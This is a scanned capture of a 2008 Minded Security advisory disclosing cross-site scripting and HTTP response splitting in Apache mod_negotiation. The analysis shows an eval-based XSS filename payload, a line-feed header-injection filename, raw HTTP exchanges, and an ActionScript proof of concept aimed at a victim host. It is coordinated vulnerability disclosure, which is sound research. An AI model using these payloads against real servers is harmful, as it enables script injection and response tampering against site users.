mindedsecurity.com
Open in
urlscan Pro
160.153.0.107
Public Scan
Submitted URL: http://www.mindedsecurity.com/MSA01150108.html
Effective URL: https://mindedsecurity.com/advisories/msa01150108/
Submission: On December 23 via api from HU — Scanned from DE
Effective URL: https://mindedsecurity.com/advisories/msa01150108/
Submission: On December 23 via api from HU — Scanned from DE
Form analysis 2 forms found in the DOM
GET https://mindedsecurity.com/
<form class="form-inline" id="searchform" role="search" method="get" action="https://mindedsecurity.com/">
<i class="fa fa-search" aria-hidden="true"></i>
<input class="form-control" id="s" name="s" type="search" placeholder="Search">
<!--<button class="btn btn-outline-success" type="submit">
</button>-->
</form>POST /advisories/msa01150108/
<form id="wpforms-form-197" class="wpforms-validate wpforms-form wpforms-ajax-form" data-formid="197" method="post" enctype="multipart/form-data" action="/advisories/msa01150108/" data-token="0f93251d58539f61d5a63f191e32eaec"
data-token-time="1734682658" novalidate="novalidate"><noscript class="wpforms-error-noscript">Abilita JavaScript nel browser per completare questo modulo.</noscript>
<div class="wpforms-field-container">
<div id="wpforms-197-field_1-container" class="wpforms-field wpforms-field-email" data-field-id="1"><label class="wpforms-field-label wpforms-label-hide" for="wpforms-197-field_1">Email <span class="wpforms-required-label">*</span></label><input
type="email" id="wpforms-197-field_1" class="wpforms-field-medium wpforms-field-required" name="wpforms[fields][1]" spellcheck="false" required=""></div>
<div id="wpforms-197-field_2-container" class="wpforms-field wpforms-field-checkbox" data-field-id="2"><label class="wpforms-field-label wpforms-label-hide">Privacy Policy <span class="wpforms-required-label">*</span></label>
<ul id="wpforms-197-field_2" class="wpforms-field-required">
<li class="choice-1 depth-1"><input type="checkbox" id="wpforms-197-field_2_1" name="wpforms[fields][2][]" value="Yes" required=""><label class="wpforms-field-label-inline" for="wpforms-197-field_2_1">Yes</label></li>
</ul>
<div class="wpforms-field-description">
<p>I subscribe to the newsletter and I accept the conditions relatives to the <a href="https://mindedsecurity.com/privacy-policy-newsletter/">Privacy Policy</a>.</p>
</div>
</div>
</div><!-- .wpforms-field-container -->
<div class="wpforms-field wpforms-field-hp"><label for="wpforms-197-field-hp" class="wpforms-field-label">Website</label><input type="text" name="wpforms[hp]" id="wpforms-197-field-hp" class="wpforms-field-medium"></div>
<div class="wpforms-recaptcha-container wpforms-is-recaptcha wpforms-is-recaptcha-type-v2">
<div class="g-recaptcha" data-sitekey="6LeT39MhAAAAAIpJ7GIGvd8pwTGwZuLQeXgue6T5" data-recaptcha-id="0">
<div style="width: 304px; height: 78px;">
<div><iframe title="reCAPTCHA" width="304" height="78" role="presentation" name="a-bg4o30gn0amq" frameborder="0" scrolling="no"
sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation"
src="https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LeT39MhAAAAAIpJ7GIGvd8pwTGwZuLQeXgue6T5&co=aHR0cHM6Ly9taW5kZWRzZWN1cml0eS5jb206NDQz&hl=de&v=zIriijn3uj5Vpknvt_LnfNbF&size=normal&cb=7w1r0kx4s86t"></iframe>
</div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response"
style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
</div><iframe style="display: none;"></iframe>
</div><input type="text" name="g-recaptcha-hidden" class="wpforms-recaptcha-hidden"
style="position:absolute!important;clip:rect(0,0,0,0)!important;height:1px!important;width:1px!important;border:0!important;overflow:hidden!important;padding:0!important;margin:0!important;" data-rule-recaptcha="1">
</div>
<div class="wpforms-submit-container"><input type="hidden" name="wpforms[id]" value="197"><input type="hidden" name="page_title" value="#MSA01150108"><input type="hidden" name="page_url"
value="https://mindedsecurity.com/advisories/msa01150108/"><input type="hidden" name="page_id" value="380"><input type="hidden" name="wpforms[post_id]" value="380"><button type="submit" name="wpforms[submit]" id="wpforms-submit-197"
class="wpforms-submit btn btn-primary" data-alt-text="update..." data-submit-text="Submit" aria-live="assertive" value="wpforms-submit">Submit</button><img
src="https://mindedsecurity.com/wp-content/plugins/wpforms-lite/assets/images/submit-spin.svg" class="wpforms-submit-spinner" style="display: none;" width="26" height="26" alt="Caricamento"></div>
</form>Text Content
Cookie Settings
We could use anonymous technical and analytical cookies to optimize your
browsing on our website. By agreeing to browse this website, you authorize the
use of cookies on our part. Privacy Policy
Got it
Subscribe our newsletter
Minded Security
* Industry
* Automotive/Maritime
* Financial
* Large scale distribution
* Industrial Control Systems
* IoT Security
* Healthcare
* Government
* Services
* Training
* Security Hackathon
* Advanced On-site Training
* Client Side Security Training
* High Level Training
* Webinar
* Testing
* Manual Secure Code Review
* Manual WAPT
* Cloud Security Testing
* IoT Security
* API Security
* Mobile Security Assessment
* Client Side Assessment
* Consulting
* Software Security Advisory
* 5D Framework
* Threat Modeling
* Secure Design
* Secure Architecture Review
* Secure Coding Guidelines
* Fixing Support
* Outsourcing Development Governance
* Automation
* Resources
* Blog
* News
* Videos
* Research
* Advisories
* Request a brochure
* About us
* The Company
* Contact us
* Newsletter
* Jobs
* Privacy Policy
home > research > advisories > #MSA01150108
CODE
ADVISORIES
#MSA01150108
Apache mod_negotiation Xss and Http Response Splitting.
AFFECTED VERSIONS:
Apache <=1.3.39
<= 2.0.61
<= 2.2.6
MINDED SECURITY REFERENCEID:
MSA01150108
CREDITS:
Discovered by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_] mindedsecurity.com
REFERENCE:
MSA01150108
SEVERITY:
Low/Medium
BACKGROUND
>From Apache Mod_Negotiation page:
Content negotiation, or more accurately content selection, is the selection of
the document that best matches the clients capabilities, from one of several
available documents. There are two implementations of this.
* A type map (a file with the handler type-map) which explicitly
lists the files containing the variants.
* A MultiViews search (enabled by the MultiViews Option, where the
server does an implicit filename pattern match, and choose from
amongst the results.
SUMMARY
Mod_negotiation doesn’t sanitize filenames in ‘406 Not Acceptable’ response and
‘300 Multiple Choices’ message body.
This could lead to Xss if the name of the file is controlled by an attacker
(i.e. by previously uploading it).
Moreover, as the list of the filenames is also sent, without being sanitized, in
the response header, it could result in a Http Response Splitting [
1] issue if the name of the file contains ‘\n’ (Line Feed).
ANALYSIS
I. Cross Site Scripting
Let’s suppose mod_negotiation is enabled and an attacker could upload a file
with arbitrary name and whatever mime extension.
For example a legit jpeg file named:
<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg
Then by requesting it without extension with Accept header set to image/jpeg; q=0,
----------------------------------------------------
GET <img%20src=sa%20onerror=eval(document.location.hash.substr(1))> HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0
HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 15:43:11 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"<img src=sa
onerror=eval(document.location.hash.substr(1))>.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 610
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /<img
src=sa
onerror=eval(document.location.hash.substr(1))> could not be found
on
this server.</p>
Available variants:
<ul>
<li><a href="<img src=sa
onerror=eval(document.location.hash.substr(1))>.jpg">
<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg</a> ,
type image/jpeg</li>
</ul>
<hr>
-----------------------------------------------------
As it could be noted, no sanitization of the filename is done, leading to Xss.
II. Http Response Splitting
By using a similar technique, Http Response Splitting could be triggered if
there’s some way to set the name of the file like the following:
'junk
Header: Injected
blah:.jpg'
Then, by requesting the urlencoded file name:
------------------------------------------------------
GET /junk%0aHeader:%20Injected%0ablah: HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0
HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 16:06:52 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"junk
Header: Injected <----- Here!
blah:.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /junk
Header: Injected
blah: could not be found on this server.</p>
Available variants:
<ul>
<li><a href="junk
Header: Injected
blah:.jpg">junk
Header: Injected
blah:.jpg</a> , type image/jpeg</li>
</ul>
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at 127.0.0.1 Port
80</address>
</body></html>
------------------------------------------------------
As it could be noted, the header response is splitted and “Header: Injected” is,
indeed injected.
Proof of Concept
The following actionscript can be used in order to trigger the Xss.
----------------------------------------------------------
// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with flex compiler
package
{
import flash.display.Sprite;
import flash.net.*
public class TestXss extends flash.display.Sprite {
public function TestXss(){
var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%20
onerror=eval(document.location.hash.substr(1))>#alert(123)');
r.method = 'POST';
r.data = unescape('test');
r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));
navigateToURL(r, '_self');
}
}
}
----------------------------------------------------------
CREDITS
Stefano di Paola is credited with the discovery of this vulnerability.
Disclosure Timeline
15/01/2008 Initial vendor notification
16/01/2008 Vendor Confirmed
21/01/2008 Coordinated public disclosure
22/01/2008 Minded Security Research Lab Advisory
REFERENCE
[
1] “Divide and Conquer, HTTP Response Splitting, Web Cache
Poisoning Attacks, and Related Topics “, Amit Klein, March 2004.
http://packetstormsecurity.org/papers/general/whit…
DISCLAIMER
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information.
Any use of this information is at the user’s own risk. Permission is hereby
granted for the redistribution of this Alert electronically. It is not to be
edited in any way without express consent of Minded Security Research Lab. If
you wish to reprint the whole or any part of this Alert in any other medium
excluding
electronic medium, please e-mail research_at_mindedsecurity.com for permission.
AUTOMATION
Implement the right DevSecOps automation and Continuous Web Application Scanning
for your needs.
CONSULTING
We are a Consultancy Company focused in supporting Companies to develop secure
products.
TESTING
We performs software security analysis in white box mode and black box mode.
TRAINING
Training and awareness in software security is critical for information
security.
MINDED SECURITY
IMQ Minded Security, an IMQ Group Company
was established in Italy in 2007 with a focus
on supporting businesses and organizations
to build secure products and services.
SERVICES
* Training
* Testing
* Consulting
* Request a brochure
INFORMATION
* The Company
* Contact us
* Privacy Policy
NEWSLETTER
Abilita JavaScript nel browser per completare questo modulo.
Email *
Privacy Policy *
* Yes
I subscribe to the newsletter and I accept the conditions relatives to the
Privacy Policy.
Website
Submit
© 2024 IMQ Minded Security S.r.l. The Software Security Company - VAT
IT05756380480
designed by jinevradesign